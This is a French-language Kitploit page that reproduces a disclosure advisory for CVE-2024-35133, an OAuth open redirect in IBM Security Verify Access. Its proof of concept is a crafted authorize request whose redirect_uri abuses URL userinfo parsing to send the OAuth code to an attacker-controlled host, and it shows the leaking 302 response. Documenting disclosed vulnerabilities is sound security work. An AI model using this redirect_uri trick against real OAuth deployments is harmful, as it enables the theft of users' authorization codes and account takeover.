Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

Bulletin de sécurité pour CVE-2024-35133 - Avec PoC

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

IBM Security Verify Access - Redirection ouverte lors du flux OAuth (CVE-2024-35133)

Table des matières

  1. Vue d'ensemble
  2. Description détaillée
  3. Preuve de concept
  4. Solution
  5. Chronologie de divulgation
  6. Références
  7. Crédits
  8. Mentions légales

Vue d'ensemble

Révision: 1.0
Impact:
En persuadant une victime de visiter un site web spécialement conçu, un attaquant distant pourrait exploiter cette vulnérabilité pour usurper l'URL affichée et rediriger l'utilisateur vers un site web malveillant. Cela pourrait permettre à l'attaquant d'obtenir des informations hautement sensibles ou de mener d'autres attaques contre la victime.

Sévérité:

  • NIST: Élevée
  • IBM: Moyenne

Score CVSS:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Fournisseur: IBM

Produits concernés:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

Versions concernées: 10.0.0 - 10.0.8

Description du produit

IBM Security Verify Access est une solution complète de gestion des politiques de sécurité réseau et d'autorisation. Elle fournit une protection de bout en bout des ressources sur des intranets et extranets géographiquement dispersés.

Parmi les principales fonctionnalités, on trouve :

  • Authentification: Large gamme d'authentificateurs intégrés et prise en charge d'authentificateurs externes.
  • Autorisation: Décisions sécurisées d'autorisation ou de refus pour les demandes de ressources protégées.
  • Sécurité des données et gestion centralisée des ressources: Gère l'accès sécurisé aux ressources réseau internes en utilisant la connectivité Internet publique via un pare-feu d'entreprise.

Description détaillée

Lors d'un test d'intrusion du flux OAuth pour un client, une vulnérabilité de redirection ouverte a été découverte, permettant la fuite de la variable « code » d'OAuth.

En contournant la logique de l'analyseur chargé de vérifier le paramètre « redirect_uri » lors d'un flux OAuth (en exploitant la RFC 3986), l'attaquant pouvait manipuler le filtre de liste blanche des domaines dans IBM Security Verify Access. Cela aboutissait à une redirection ouverte vers n'importe quel domaine arbitraire contrôlé par l'attaquant. La victime pouvait être redirigée vers un site malveillant alors que le domaine semblait de confiance.

Cela pourrait conduire à l'exposition d'informations sensibles telles que le jeton « code » d'OAuth ou à d'autres attaques contre la victime.


Preuve de concept

Requête

root@kitploit:~
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Réponse

root@kitploit:~
HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

Solution

Reportez-vous au Bulletin de sécurité IBM 7166712 pour obtenir des informations sur les correctifs, les mises à niveau ou les solutions de contournement suggérées.
Voir Références pour plus de détails.


Chronologie de divulgation

  • 19/03/2024: Vulnérabilité découverte par le chercheur en sécurité (Giulio Garzia)
  • 21/03/2024: Vulnérabilité partagée avec le client utilisant IBM Security Verify Access
  • 02/04/2024: Vulnérabilité signalée à IBM
  • 14/05/2024: Vulnérabilité confirmée par IBM
  • 18/07/2024: Correctif de pré-version fourni par IBM au client
  • 27/08/2024: Bulletin de sécurité et vulnérabilité communiqués par IBM

Références

  1. Bulletin de sécurité IBM CVE-2024-35133
  2. Base de données des vulnérabilités IBM X-Force
  3. NIST CVE-2024-35133
  4. CWE-178: Gestion inappropriée de l'URL

Crédits

Cette vulnérabilité a été découverte et signalée par :

  • Giulio Garzia
    LinkedIn
    GitHub

Mentions légales

Copyright (c) 2024 Giulio Garzia « Ozozuz »

La redistribution électronique de cette alerte est autorisée. Elle ne peut être modifiée sans le consentement écrit explicite de l'auteur. Pour obtenir l'autorisation de reproduire cette alerte dans d'autres médias, contactez l'auteur.

Avertissement: Les informations contenues dans cet avis sont exactes au moment de la publication, sur la base des données disponibles. Aucune garantie n'est fournie. Ni l'auteur ni l'éditeur n'acceptent de responsabilité pour les dommages directs, indirects ou consécutifs découlant de l'utilisation de ces informations.

Télécharger l’outil